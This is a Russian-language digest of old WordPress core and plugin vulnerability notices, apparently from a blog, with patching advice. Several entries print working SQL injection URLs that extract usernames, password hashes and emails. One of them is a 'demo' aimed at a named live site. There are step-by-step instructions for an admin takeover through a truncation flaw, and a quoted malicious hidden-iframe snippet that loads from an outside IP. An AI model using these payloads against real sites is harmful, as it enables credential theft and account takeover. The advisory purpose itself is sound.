Уязвимость WordPress плагина fMoblog 2.1
Найдена уязвимость в WordPress плагине fMoblog, которая позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных WordPress.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «id».
Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
# Exploit:
http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,gr
oup_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
# Demo:
http://www.tarynitup.com/?page_id=20&id=-999+union+all+select+1,2,3,4,group
_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+wp_users--
Уязвимость в WordPress MU < 2.7
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему.
Уязвимость существует из-за ошибки в функции choose_primary_blog при проверке HOST заголовка.
Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Для устранения уязвимости рекомендуется обновить WordPress MU до версии 2.7
.
Уязвимость WordPress плагина WP-Forum 1.7.8
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «thread» сценарием forum_feed.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=[SQL]
http://site.com/blog/wp-content/plugins/wp-forum/forum_feed.php?thread=-99999+union+select+1,2,3,concat(user_login,0x2f,user_pass,0x2f,user_email),5,6,7+from+wp_users/*
Уязвимость в WordPress ниже 2.6.3
Если вы еще не обновили свой блог, до версии 2.7, которая на данный момент является финальной стабильной версией WordPress, возможно некоторые уязвимости в старых версиях WordPress заставят вас задуматься об этом.
Jeremias Reith опубликовал уязвимость на сервис которая при удачном использовании позволяет злоумышленнику, получить доступ к панели администрирования вашего блога.
Данная уязвимость исправлена в версии WordPress 2.6.5, но желательно обновлять блог, до последней версии WordPress 2.7
Уязвимости в плагинах Media Holder и e-Commerce
Найдены уязвимости в WordPress-плагинах Media Holder и E-Commerce.
На обе уязвимости уже выпущены эксплоиты, которые могут использоваться для нарушения безопасности Вашего блога.
Плагин Media Holder предназначен для размещения в блоге различных медиа-данных, видео, аудио и тп.
Плагин e-Commerce используется для создания интернет-магазина на основе вашего WordPress-блога.
Уязвимость в плагине WordPress Media Holder связана с ошибкой обработки данных при работе с базой MySQL вашего блога. Эксплоит можно просмотреть .
Уязвимость в плагине WordPress e-Commerce связана с неправильной обработкой загружаемых на сервер файлов. Эксплоит можно посмотреть .
Если вы используете один из этих плагинов в своем блоге, отключите их до тех пор, пока появится обновление, которое исправляет данные уязвимости.
Для борьбы с уязвимостями которые используют базу данных MySQL в WordPress-блоге, возможно будет полезно изменение префикса таблиц, при установке блога, либо если блог уже установлен со стандартным префиксом wp_ воспользуйтесь плагином, который изменяет префиксы таблиц, в уже существующем блоге.
Уязвимость SQL-инъекции в плагине WP Comment Remix
Найдена уязвимость в плагине WordPress - WP Comment Remix. Плагин предназначается для улучшения функций комментирования. Позволяет добавить функции цитирования и ответа на комментарии.
На эту уязвимость уже написан эксплоит, который позволяет извлечь из блога-жертвы очень много, важных данных, таких как:
- Настройки блога и активные плагины
- Список пользователей блога
- Список администраторов блога
Сам эскплоит можно скачать .
Для закрытия уязвимости, либо отключите плагин, либо смените префикс таблиц, в базе данных вашего блога со стандартного wp_ на что-то типа dsf342h_
Уязвимость усечения данных в SQL WordPress 2.6.1
Найдена новая уязвимость в WordPress 2.6.1 которая заключается в ошибке усечения данных в базе SQL.
- Идем по ссылке server.com/wp-login.php?action=register
- Регистрируемся как пользователь "admin x" и Ваш email
- Логин выглядит как admin[55 пробелов]х
- После регистрации дубликата логина администратора, идем по ссылке восстановления пароля: server.com/wp-login.php?action=lostpassword
- В форме восстановления пароля вводим email на который регистрировали дубликат логина администратора.
- Получаем письмо с ссылкой на сброс пароля, сбрасываем пароль администратора. Новый пароль прийдет на email, но правда уже не на Ваш, а на email администратора блога.
Уязвимости в Contact Form ][ для WordPress
Найдена уязвимость в плагинах контактной формы WordPress - Contact Form версии 2.0.13 и ниже.
Плохая защита от ботов: отсутствие капчи, позволяет спам-ботам отправлять неограниченное количество спам-сообщений администратору сайта.
Использование функционала для рассылки спама: в форме контактов есть поле которое называется "Отправить копию самому себе", это настраивается в настройках плагина (CarbonCopy Ability), используя это поле, спам можно отправлять не только администратору сайта но и другим людям.
Используя эти две уязвимости, можно превратить контактную форму в инструмент по рассылке спама, большому количеству людей.
Источник: .
В своих блогах и своим заказчикам я устанавливаю контактную форму WordPress с помощью плагина WordPress Contact Form III, там присутствует проверка от спам-ботов.
Секретные ключи в WordPress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации WordPress, хочу обратить ваше внимание на то, что в новой версии WordPress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении WordPress блога.
Строчки эти выглядят вот так:
define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('SECURE_AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
define('LOGGED_IN_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу.
Значение каждого параметра должно быть уникальным, сложным и длинным. Что бы не утруждать себя выдумыванием этих значений, вы можете воспользоваться специальным , который генерирует эти три строчки для вашего файла конфигурации.
Просто откройте эту , и скопируйте код в файл конфигурации вашего WordPress блога wp-config.php, вот и все, теперь проблема с уникальными ключами вашего блога решена и ваш блог стал еще более защищённым.
Блоговодство:
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода.
<!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics -->
Если у вас нашлось что-то подобное, ознакомьтесь с этим постом.
